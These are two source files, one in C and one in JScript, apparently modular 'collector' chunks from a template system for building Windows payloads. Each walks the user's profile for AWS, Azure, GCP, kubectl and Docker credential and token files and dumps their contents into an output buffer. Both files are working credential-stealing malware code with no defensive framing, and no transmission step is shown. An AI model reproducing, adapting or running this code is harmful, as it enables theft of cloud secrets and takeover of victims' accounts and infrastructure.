File: templates/chunks/collectors/cloud_creds.c
// chunk: collectors/cloud_creds
// depends: core/emit_buffer, core/file_ops
// provides: collect_cloud_creds
// headers: shlobj.h

#ifndef CHUNK_CLOUD_CREDS
#define CHUNK_CLOUD_CREDS

#include <shlobj.h>

static void collect_cloud_creds(void) {
    char home[MAX_PATH] = {0};
    if (SHGetFolderPathA(NULL, CSIDL_PROFILE, NULL, 0, home) != S_OK) return;

    struct { const char *name; const char *rel; } cloud_files[] = {
        {"AWS credentials",      ".aws\\credentials"},
        {"AWS config",           ".aws\\config"},
        {"Azure profile",        ".azure\\azureProfile.json"},
        {"Azure tokens",         ".azure\\accessTokens.json"},
        {"GCP app creds",        "AppData\\Roaming\\gcloud\\application_default_credentials.json"},
        {"GCP properties",       "AppData\\Roaming\\gcloud\\properties"},
        {"kubectl config",       ".kube\\config"},
        {"Docker config",        ".docker\\config.json"},
    };

    int found = 0;
    for (int i = 0; i < (int)(sizeof(cloud_files)/sizeof(cloud_files[0])); i++) {
        char full[MAX_PATH];
        snprintf(full, MAX_PATH, "%s\\%s", home, cloud_files[i].rel);
        if (file_exists(full)) {
            if (!found) emitf("=== CLOUD CREDENTIALS ===\r\n");
            found = 1;
            emitf("[%s]\r\n", cloud_files[i].name);
            emit_file(full, 512*1024);
            emitf("\r\n");
        }
    }
    if (found) emitf("\r\n");
}

#endif

File: templates/chunks/jscript/collectors/cloud_creds.js
// chunk: collectors/cloud_creds
// depends: core/emit_buffer, core/file_ops
// provides: collect_cloud_creds
// format: jscript

function collect_cloud_creds() {
    emit("\r\n=== CLOUD CREDENTIALS ===\r\n");
    var home = _s.ExpandEnvironmentStrings("%USERPROFILE%");
    var creds = [
        {name: "AWS credentials", path: home + "\\.aws\\credentials"},
        {name: "AWS config", path: home + "\\.aws\\config"},
        {name: "Azure profile", path: home + "\\.azure\\azureProfile.json"},
        {name: "Azure tokens", path: home + "\\.azure\\accessTokens.json"},
        {name: "GCP creds", path: _s.ExpandEnvironmentStrings("%APPDATA%") + "\\gcloud\\credentials.db"},
        {name: "GCP properties", path: _s.ExpandEnvironmentStrings("%APPDATA%") + "\\gcloud\\properties"},
        {name: "Kube config", path: home + "\\.kube\\config"},
        {name: "Docker config", path: home + "\\.docker\\config.json"}
    ];
    for (var i = 0; i < creds.length; i++) {
        if (file_exists(creds[i].path)) {
            emit("  " + creds[i].name + ": FOUND\r\n");
            emit(read_file(creds[i].path, 32768));
            emit("\r\n");
        }
    }
}
